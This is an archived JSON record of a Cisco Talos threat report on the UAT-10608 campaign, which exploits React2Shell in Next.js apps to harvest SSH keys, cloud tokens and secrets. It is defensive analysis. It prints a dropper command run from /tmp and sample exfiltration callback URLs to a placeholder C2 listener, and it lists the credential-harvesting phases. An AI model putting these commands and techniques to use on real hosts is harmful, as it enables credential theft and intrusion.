{
	"id": "967377bd-f113-4d44-9c08-24b39cf4d869",
	"created_at": "2026-04-10T03:20:51.571116Z",
	"updated_at": "2026-04-10T03:22:18.547246Z",
	"deleted_at": null,
	"sha1_hash": "06efe49641810a89ea82ae7b25160544fb539362",
	"title": "UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 467106,
	"plain_text": "UAT-10608: Inside a large-scale automated credential harvesting\r\noperation targeting web applications\r\nBy Asheer Malhotra\r\nPublished: 2026-04-02 · Archived: 2026-04-10 02:00:37 UTC\r\nThursday, April 2, 2026 06:00\r\nCisco Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat\r\ncluster we are tracking as “UAT-10608.” \r\nPost-compromise, UAT-10608 leverages automated scripts for extracting and exfiltrating credentials from a\r\nvariety of applications, that are then posted to its command and control (C2). \r\nThe C2 hosts a web-based graphical user interface (GUI) titled “NEXUS Listener” that can be used to view\r\nstolen information and gain analytical insights using precompiled statistics on credentials harvested and\r\nhosts compromised. \r\nTalos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we\r\ncurrently track as UAT-10608. The campaign is primarily leveraging a collection framework dubbed “NEXUS\r\nListener.” The systematic exploitation and exfiltration campaign has resulted in the compromise of at least 766\r\nhosts, as of time of writing, across multiple geographic regions and cloud providers. The operation is\r\ntargeting Next.js applications vulnerable to React2Shell (CVE-2025-55182) to gain initial access, then is\r\ndeploying a multi-phase credential harvesting tool that harvests credentials, SSH keys, cloud tokens, and\r\nenvironment secrets at scale. \r\nThe breadth of the victim set and the indiscriminate targeting pattern is consistent with automated scanning\r\n— likely based on host profile data from services like Shodan, Censys, or custom scanners to enumerate publicly\r\nreachable Next.js deployments and probe them for the described React configuration vulnerabilities. \r\nThe core component of the framework is a web application that makes all of the exfiltrated data available to the\r\noperator in a graphical interface that includes in-depth statistics and search capabilities to allow them to sift\r\nthrough the compromised data. \r\nThis post details the campaign's methodology, tools, breadth and sensitivity of the exposed data, and the\r\nimplications for organizations impacted by this activity. \r\nThis analysis is based on data collected for security research purposes. Specific credentials and victim identifiers\r\nhave been withheld from this publication. Talos has informed service providers of exposed and at-risk\r\ncredentials and is working with industry partners such as GitHub and AWS to quarantine credentials and inform\r\nvictims. \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 1 of 9\n\nMetric  Count \r\nCompromised hosts  766 \r\nHosts with database credentials  ~701 (91.5%) \r\nHosts with SSH private keys  ~599 (78.2%) \r\nHosts with AWS credentials  ~196 (25.6%) \r\nHosts with shell command history  ~245 (32.0%) \r\nHosts with live Stripe API keys  ~87 (11.4%) \r\nHosts with GitHub tokens  ~66 (8.6%) \r\n10,120 \r\nInitial access \r\nUAT-10608 targets public-facing web applications using components, predominately Next.js, that are vulnerable\r\nto CVE-2025-55182, broadly referred to as “React2Shell.” \r\nReact2Shell is a pre-authentication remote code execution (RCE) vulnerability in React Server Components\r\n(RSC). RSCs expose Server Function endpoints that accept serialized data from clients. The affected code\r\ndeserializes payloads from inbound HTTP requests to these endpoints without adequate validation or sanitization. \r\nExploitation steps \r\n1. An attacker identifies a publicly accessible application using a vulnerable version of RSCs or a framework\r\nbuilt on top of it (e.g., Next.js). \r\n2. The attacker crafts a malicious serialized payload designed to abuse the deserialization routine — a\r\ntechnique commonly used to trigger arbitrary object instantiation or method invocation on the server. \r\n3. The payload is sent via an HTTP request directly to a Server Function endpoint.\r\nNo authentication is required. \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 2 of 9\n\n4. The server deserializes the malicious payload, resulting in arbitrary code execution in the server-side\r\nNode.js process. \r\nOnce the threat actor identifies a vulnerable endpoint, the automated toolkit takes over. No further manual\r\ninteraction is required to extract and exfiltrate credentials harvested from the system. \r\nAutomated harvesting script \r\nData is collected via nohup-executed shell scripts dropped in /tmp with randomized names:\r\n/bin/sh -c nohup sh /tmp/.eba9ee1e4.sh \u003e/dev/null 2\u003e\u00261\r\nThis is consistent with a staged payload delivery model. The initial React exploit delivers a small dropper that\r\nfetches and runs the full multi-phase harvesting script. Upon execution, the harvesting script iterates through\r\nseveral phases to collect various data from the compromised system, outlined below: \r\nenviron - Dump running process environment variables  \r\njsenv - Extract JSON-parsed environment from JS runtime  \r\nssh - Harvest SSH private keys and authorized_keys  \r\ntokens - Pattern-match and extract credential strings  \r\nhistory - Capture shell command history  \r\ncloud_meta - Query cloud metadata APIs (AWS/GCP/Azure)  \r\nk8s - Extract Kubernetes service account tokens  \r\ndocker - Enumerate container configurations  \r\ncmdline - List all running process command lines  \r\nproc_all - Aggregate all process environment variables \r\nThe framework leverages a meta.json file that tracks execution state: \r\n Following the completion of each collection phase, an HTTP request is made back to the C2 server running the\r\nNEXUS Listener component. In most cases, the callback takes place on port 8080 and contains the following\r\nparameters: \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 3 of 9\n\nHostname \r\nPhase \r\nID \r\nSome examples of the full URL, executed after each phase: \r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=info\u0026id= 123abc45\r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=jsenv\u0026id= 123abc45\r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=k8s\u0026id=123abc45\r\nhttp://\u003cNEXUS_LISTENER_IP\u003e:8080/h=\u003cVICTIM_HOSTNAME\u003e\u0026l=crontab\u0026id=123abc45\r\nNEXUS Listener \r\nAfter data is exfiltrated from a compromised system and sent back to the C2 infrastructure, it is stored in a\r\ndatabase and made available via a web application called NEXUS Listener. In most instances, the web application\r\nfront end is protected with a password, the prompt for which can be seen in Figure 1. \r\nFigure 1. NEXUS Listener Login Prompt.\r\n In at least one instance, the web application was left exposed, revealing a wealth of information, including the\r\ninner workings of the application itself, as well as the data that was harvested from compromised systems. \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 4 of 9\n\nFigure 2. NEXUS Listener homepage with statistics.\r\nThe application contains a listing of several statistics, including the number of hosts compromised and the total\r\nnumber of each credential type that were successfully extracted from those hosts. It also lists the uptime of the\r\napplication itself. In this case, the automated exploitation and harvesting framework was able to successfully\r\ncompromise 766 hosts within a 24-hour period. \r\nFigure 3. NEXUS Listener victims list.\r\nThe web application allows a user to browse through all of the compromised hosts. A given host can then be\r\nselected, bringing up a menu with all of the exfiltrated data corresponding to each phase of the harvesting script. \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 5 of 9\n\nFigure 4. NEXUS Listener individual victim credentials.\r\nThe observed NEXUS Listener instances display “v3” in the title, indicating the application has gone through\r\nvarious stages of development before reaching the currently deployed version.\r\nAnalysis \r\nCisco Talos was able to obtain data from an unauthenticated NEXUS Listener instance. The following is an\r\nanalysis of that data, broken down by credential category. \r\nCredential Categories \r\nEnvironment secrets and API keys \r\nThe “environ.txt” and “jsenv.txt” files contain the runtime environment of each compromised application process,\r\nexposing a variety of third-party API credentials: \r\nAI platform keys: OpenAI, Anthropic, NVIDIA NIM, OpenRouter, Tavily \r\nPayment processors: Stripe live secret keys (sk_live_*) \r\nCloud providers: AWS access key/secret pairs, Azure subscription credentials \r\nCommunication platforms: SendGrid, Brevo/Sendinblue transactional email API keys, Telegram bot tokens\r\nand webhook secrets \r\nSource control: GitHub personal access tokens, GitLab tokens \r\nDatabase connection strings: Full DATABASE_URL values including hostnames, ports, usernames, and\r\ncleartext passwords \r\nCustom application secrets: Auth tokens, dashboard passwords, webhook signing secrets — often high-entropy hex or Base64 strings \r\nSSH private keys \r\nPresent in 78% of hosts, the “ssh.txt” files contain complete PEM-encoded private keys (both ED25519 and RSA\r\nformats) along with authorized_keys entries. These keys enable lateral movement to any other system that trusts\r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 6 of 9\n\nthe compromised host's key identity — a particularly severe finding for organizations with shared key\r\ninfrastructure or bastion-host architectures. \r\nCloud credential harvesting \r\nThe “aws_full.txt” and “cloud_meta.txt” phases attempt to query the AWS Instance Metadata Service (IMDS),\r\nGCP metadata server, and Azure IMDS. For cloud-hosted targets, successful retrieval yields IAM role-associated\r\ntemporary credentials — credentials that carry whatever permissions were granted to the instance role, which in\r\nmisconfigured environments can include S3 bucket access, EC2 control plane operations, or secrets manager read\r\naccess. \r\nKubernetes service account tokens \r\nThe “k8s.txt” phase targets containerized workloads, attempting to read the default service account token mounted\r\nat /var/run/secrets/kubernetes.io/serviceaccount/token. A compromised Kubernetes token can allow an attacker\r\nto enumerate cluster resources, read secrets from other namespaces, or escalate to cluster-admin depending on\r\nRBAC configuration. \r\nDocker container intelligence \r\nFor hosts running Docker (approximately 6% of the dataset), the “docker.txt” phase enumerates all running\r\ncontainers, their images, exposed ports, network configurations, mount points, and environment variables. Notable\r\nservices observed include phpMyAdmin instances, n8n workflow automation, and internal administrative\r\ndashboards — all of which are high-value targets for follow-on access. \r\nShell command history \r\nCommand history files reveal operator behavior on compromised systems and other information that could be\r\nuseful for post-compromise activity. Observed patterns include: \r\nMySQL client invocations with explicit credentials: mysql -u root -p \r\nDatabase service management: /etc/init.d/mysqld restart\r\nImplications \r\nCredential compromise and account takeover: Every credential in this dataset should be considered\r\nfully compromised. Live Stripe secret keys enable fraudulent charges and refund manipulation. AWS keys\r\nwith broad IAM permissions enable cloud infrastructure takeover, data exfiltration from S3, and lateral\r\nmovement within AWS organizations. Database connection strings with cleartext passwords provide direct\r\naccess to application data stores containing user personally identifiable information (PII), financial records,\r\nor proprietary data. \r\nLateral movement via SSH: The large corpus of exposed SSH private keys creates a persistent lateral\r\nmovement risk that survives the rotation of application credentials. If any of these keys are reused across\r\nsystems (a common operational practice), the attacker retains access to those systems even after\r\nthe initial compromise is detected and remediated. \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 7 of 9\n\nSupply chain risk: Several hosts show evidence of package registry authentication files (“pkgauth.txt”),\r\nincluding npm and pip configuration with registry credentials. Compromised package registry tokens could\r\nenable a supply chain attack — publishing malicious versions of packages under a legitimate maintainer's\r\nidentity. \r\nData aggregation and intelligence value: Beyond the immediate operational value of individual\r\ncredentials, the aggregate dataset represents a detailed map of the victim organizations' infrastructure: what\r\nservices they run, how they're configured, what cloud providers they use, and what third-party integrations\r\nare in place. This intelligence has significant value for crafting targeted follow-on attacks, social\r\nengineering campaigns, or selling access to other threat actors. \r\nReputational and regulatory exposure: For any organization whose data appears in this set, there are\r\nserious compliance implications. Database credentials exposing PII trigger breach notification\r\nrequirements under GDPR, CCPA, and sector-specific regulations. Organizations that process payments\r\nwhose Stripe keys are exposed face PCI DSS incident response obligations. The exposure of AI platform\r\nAPI keys can result in significant unauthorized usage charges in addition to the security risk. \r\nRecommendations \r\n1. Audit getServerSideProps and getStaticProps implementations: Ensure no secrets or server-only\r\nenvironment variables are passed as props to client components. \r\n2. Enforce NEXT_PUBLIC_ prefix discipline: Only variables that are intentionally public should carry this\r\nprefix. Audit all variables for misclassification. \r\n3. Rotate all credentials immediately if any overlap with the described victim profile is suspected. \r\n4. Implement IMDSv2 enforcement on all AWS EC2 instances to require session-oriented metadata queries,\r\nblocking unauthenticated metadata service abuse. \r\n5. Segment SSH keys: Avoid reusing SSH key pairs across different systems or environments. \r\n6. Enable cloud provider secret scanning: AWS, GitHub, and others offer native secret scanning that can\r\ndetect and alert on committed or exposed credentials. \r\n7. Deploy runtime application self-protection (RASP) or a WAF rule set tuned for Next.js-specific attack\r\npatterns, particularly those targeting SSR data injection points. \r\n8. Audit container environments for least-privilege. Application containers should not have access to the\r\nhost SSH agent, host filesystem mounts containing sensitive data, or overly permissive IAM instance\r\nroles. \r\nCoverage \r\nSNORT® ID for CVE-2025-55182, aka React2Shell: 65554 \r\nIndicators of compromise (IOCs) \r\nOrganizations should investigate for the following artifacts on web application hosts: \r\nUnexpected processes spawned from /tmp/ with randomized dot-prefixed names (e.g., /tmp/.e40e7da0c.sh) \r\nnohup invocations in process listings not associated with known application workflows \r\nUnusual outbound HTTP/S connections from application containers to non-production endpoints \r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 8 of 9\n\nEvidence of __NEXT_DATA__ containing server-side secrets in rendered HTML \r\nIOCs for this threat also available on our GitHub repository here.\r\n144[.]172[.]102[.]88\r\n172[.]86[.]127[.]128\r\n144[.]172[.]112[.]136\r\n144[.]172[.]117[.]112\r\nSource: https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-application\r\ns/\r\nhttps://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/"
	],
	"report_names": [
		"uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications"
	],
	"threat_actors": [],
	"ts_created_at": 1775791251,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/06efe49641810a89ea82ae7b25160544fb539362.pdf",
		"text": "https://archive.orkl.eu/06efe49641810a89ea82ae7b25160544fb539362.txt",
		"img": "https://archive.orkl.eu/06efe49641810a89ea82ae7b25160544fb539362.jpg"
	}
}